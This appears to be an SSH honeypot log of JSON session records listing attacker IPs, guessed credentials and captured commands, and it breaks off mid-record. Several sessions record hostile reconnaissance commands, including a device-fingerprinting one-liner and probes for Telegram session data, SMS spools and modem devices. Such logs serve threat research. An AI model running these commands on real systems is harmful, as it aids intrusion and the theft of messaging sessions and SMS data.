Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: ideal
{
"id": "4eb30cc1e194",
"src_ip": "184.168.21.211",
"start_time": "2026-07-03T01:57:34.512768Z",
"end_time": "2026-07-03T01:57:35.616177Z",
"duration": "1.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "ideal",
"pass": "ideal123"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sergey
{
"id": "4ec63714ef89",
"src_ip": "178.62.37.109",
"start_time": "2026-07-03T01:56:41.941401Z",
"end_time": "2026-07-03T01:56:44.713029Z",
"duration": "2.8",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "sergey",
"pass": "123456"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: scheinas
{
"id": "61e93986f9c5",
"src_ip": "178.62.37.109",
"start_time": "2026-07-03T01:53:18.101189Z",
"end_time": "2026-07-03T01:53:20.809789Z",
"duration": "2.7",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "scheinas",
"pass": "123456"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sadygov
{
"id": "9607269d9922",
"src_ip": "178.62.37.109",
"start_time": "2026-07-03T01:49:50.599825Z",
"end_time": "2026-07-03T01:49:53.509700Z",
"duration": "2.9",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "sadygov",
"pass": "123456"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "10090a670d5b",
"src_ip": "118.26.110.171",
"start_time": "2026-07-03T01:48:57.796431Z",
"end_time": "2026-07-03T01:48:58.039549Z",
"duration": "0.2",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: suvorova
{
"id": "c0c07519dd19",
"src_ip": "178.62.37.109",
"start_time": "2026-07-03T01:46:26.898915Z",
"end_time": "2026-07-03T01:46:29.934964Z",
"duration": "3.0",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "suvorova",
"pass": "123456"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: star
{
"id": "b80dbd12aaef",
"src_ip": "178.62.37.109",
"start_time": "2026-07-03T01:43:08.701903Z",
"end_time": "2026-07-03T01:43:11.432479Z",
"duration": "2.7",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "star",
"pass": "123456"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "a5e642decf82",
"src_ip": "14.103.127.23",
"start_time": "2026-07-03T01:43:05.297582Z",
"end_time": "2026-07-03T01:45:05.402357Z",
"duration": "120.1",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "fa760ada8f1e",
"src_ip": "144.202.92.17",
"start_time": "2026-07-03T01:39:50.197897Z",
"end_time": "2026-07-03T01:39:51.083355Z",
"duration": "0.9",
"version": "SSH-2.0-Go",
"hassh": "e54ef3ec27fe1fea7ab64d3fa05359fd",
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: solne
{
"id": "718ba6585637",
"src_ip": "178.62.37.109",
"start_time": "2026-07-03T01:39:44.298809Z",
"end_time": "2026-07-03T01:39:46.943881Z",
"duration": "2.6",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "solne",
"pass": "123456"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: smbat
{
"id": "fd3937f2b25c",
"src_ip": "178.62.37.109",
"start_time": "2026-07-03T01:36:16.300581Z",
"end_time": "2026-07-03T01:36:19.609518Z",
"duration": "3.3",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "smbat",
"pass": "123456"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sin
{
"id": "b4d3cc183fef",
"src_ip": "178.62.37.109",
"start_time": "2026-07-03T01:32:47.998535Z",
"end_time": "2026-07-03T01:32:50.836129Z",
"duration": "2.8",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "sin",
"pass": "123456"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: shmatov
{
"id": "272e8a322ad7",
"src_ip": "178.62.37.109",
"start_time": "2026-07-03T01:29:26.298774Z",
"end_time": "2026-07-03T01:29:29.415829Z",
"duration": "3.1",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "shmatov",
"pass": "123456"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 123root321
Remote entity achieved interactive shell state. Command sequence (1 executed):
{
"id": "3043837f43b2",
"src_ip": "185.242.3.195",
"start_time": "2026-07-03T01:26:54.215726Z",
"end_time": "2026-07-03T01:26:55.382068Z",
"duration": "1.2",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "123root321"
},
"commands": [
"echo OK"
],
"detailed_commands": [
{
"cmd": "echo OK",
"failed": false,
"error": null
}
],
"failed_commands": [],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sharipov
{
"id": "832f843a259c",
"src_ip": "178.62.37.109",
"start_time": "2026-07-03T01:26:08.144392Z",
"end_time": "2026-07-03T01:26:11.397381Z",
"duration": "3.3",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "sharipov",
"pass": "123456"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sereda
{
"id": "d2fe3fce3ff0",
"src_ip": "178.62.37.109",
"start_time": "2026-07-03T01:22:39.136694Z",
"end_time": "2026-07-03T01:22:42.622229Z",
"duration": "3.5",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "sereda",
"pass": "123456"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: schatrch
{
"id": "8a7bf308bc7a",
"src_ip": "178.62.37.109",
"start_time": "2026-07-03T01:19:34.933023Z",
"end_time": "2026-07-03T01:19:36.775891Z",
"duration": "1.8",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "schatrch",
"pass": "123456"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: support / support
{
"id": "948f931f8b06",
"src_ip": "176.53.159.196",
"start_time": "2026-07-03T01:17:08.423378Z",
"end_time": "2026-07-03T01:17:09.586139Z",
"duration": "1.2",
"version": "SSH-2.0-Go",
"hassh": "eff4c24daffc8532c160e86e5f006e53",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "support",
"pass": "support"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: saa
{
"id": "aaaff099aeed",
"src_ip": "178.62.37.109",
"start_time": "2026-07-03T01:17:04.015410Z",
"end_time": "2026-07-03T01:17:05.730468Z",
"duration": "1.7",
"version": "SSH-2.0-Go",
"hassh": "16443846184eafde36765c9bab2f4397",
"attempts": [
{
"user": "saa",
"pass": "123456"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "494c47fe3f76",
"src_ip": "178.62.37.109",
"start_time": "2026-07-03T01:12:59.983010Z",
"end_time": "2026-07-03T01:13:00.123753Z",
"duration": "0.1",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Credential acceptance event recorded. Target authentication: root / root
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "5431261daeeb",
"src_ip": "5.239.41.161",
"start_time": "2026-07-03T01:11:01.018980Z",
"end_time": "2026-07-03T01:12:22.245236Z",
"duration": "81.2",
"version": "SSH-2.0-libssh2_1.11.1",
"hassh": "f45fb203c31069bb280067b71ed92ccb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "root"
},
"commands": [
"/ip cloud print",
"ifconfig",
"uname -a",
"cat /proc/cpuinfo",
"ps | grep '[Mm]iner'",
"ps -ef | grep '[Mm]iner'",
"ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*",
"locate D877F783D5D3EF8Cs",
"echo Hi | cat -n"
],
"detailed_commands": [
{
"cmd": "/ip cloud print",
"failed": true,
"error": "Command not found: /ip cloud print"
},
{
"cmd": "ifconfig",
"failed": false,
"error": null
},
{
"cmd": "uname -a",
"failed": false,
"error": null
},
{
"cmd": "cat /proc/cpuinfo",
"failed": false,
"error": null
},
{
"cmd": "ps | grep '[Mm]iner'",
"failed": false,
"error": null
},
{
"cmd": "ps -ef | grep '[Mm]iner'",
"failed": false,
"error": null
},
{
"cmd": "ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*",
"failed": false,
"error": null
},
{
"cmd": "locate D877F783D5D3EF8Cs",
"failed": false,
"error": null
},
{
"cmd": "echo Hi | cat -n",
"failed": false,
"error": null
}
],
"failed_commands": [
"/ip cloud print"
],
"score": 530,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"ROUTER TARGETING",
"DATA THEFT",
"SUCCESSFUL LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "9213b773587a",
"src_ip": "45.148.10.151",
"start_time": "2026-07-03T01:06:06.131160Z",
"end_time": "2026-07-03T01:06:06.912785Z",
"duration": "0.8",
"version": "SSH-2.0-PUTTY",
"hassh": "5bd26477da5440a6187bd3f1b39a429c",
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Credential acceptance event recorded. Target authentication: root / root
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "869944732d99",
"src_ip": "158.101.161.27",
"start_time": "2026-07-03T00:41:23.282111Z",
"end_time": "2026-07-03T00:42:08.585576Z",
"duration": "45.3",
"version": "SSH-2.0-libssh2_1.11.1",
"hassh": "f45fb203c31069bb280067b71ed92ccb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "root"
},
"commands": [
"/ip cloud print",
"ifconfig",
"uname -a",
"cat /proc/cpuinfo",
"ps | grep '[Mm]iner'",
"ps -ef | grep '[Mm]iner'",
"ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*",
"locate D877F783D5D3EF8Cs",
"echo Hi | cat -n"
],
"detailed_commands": [
{
"cmd": "/ip cloud print",
"failed": true,
"error": "Command not found: /ip cloud print"
},
{
"cmd": "ifconfig",
"failed": false,
"error": null
},
{
"cmd": "uname -a",
"failed": false,
"error": null
},
{
"cmd": "cat /proc/cpuinfo",
"failed": false,
"error": null
},
{
"cmd": "ps | grep '[Mm]iner'",
"failed": false,
"error": null
},
{
"cmd": "ps -ef | grep '[Mm]iner'",
"failed": false,
"error": null
},
{
"cmd": "ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*",
"failed": false,
"error": null
},
{
"cmd": "locate D877F783D5D3EF8Cs",
"failed": false,
"error": null
},
{
"cmd": "echo Hi | cat -n",
"failed": false,
"error": null
}
],
"failed_commands": [
"/ip cloud print"
],
"score": 520,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"ROUTER TARGETING",
"DATA THEFT",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: support / support
{
"id": "822a22ea8726",
"src_ip": "176.53.159.196",
"start_time": "2026-07-03T00:16:57.467886Z",
"end_time": "2026-07-03T00:16:58.626278Z",
"duration": "1.2",
"version": "SSH-2.0-Go",
"hassh": "eff4c24daffc8532c160e86e5f006e53",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "support",
"pass": "support"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 1234567
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "52db3780f66b",
"src_ip": "91.92.40.7",
"start_time": "2026-07-03T00:11:51.821810Z",
"end_time": "2026-07-03T00:11:54.486546Z",
"duration": "2.7",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "1234567"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"RECONNAISSANCE",
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 123456
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "d5a4235e697f",
"src_ip": "91.92.40.7",
"start_time": "2026-07-03T00:10:07.954930Z",
"end_time": "2026-07-03T00:10:09.986092Z",
"duration": "2.0",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "123456"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"RECONNAISSANCE",
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 12345
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "1adac5c37369",
"src_ip": "91.92.40.7",
"start_time": "2026-07-03T00:08:27.137039Z",
"end_time": "2026-07-03T00:08:29.992104Z",
"duration": "2.9",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "12345"
},
"commands": [
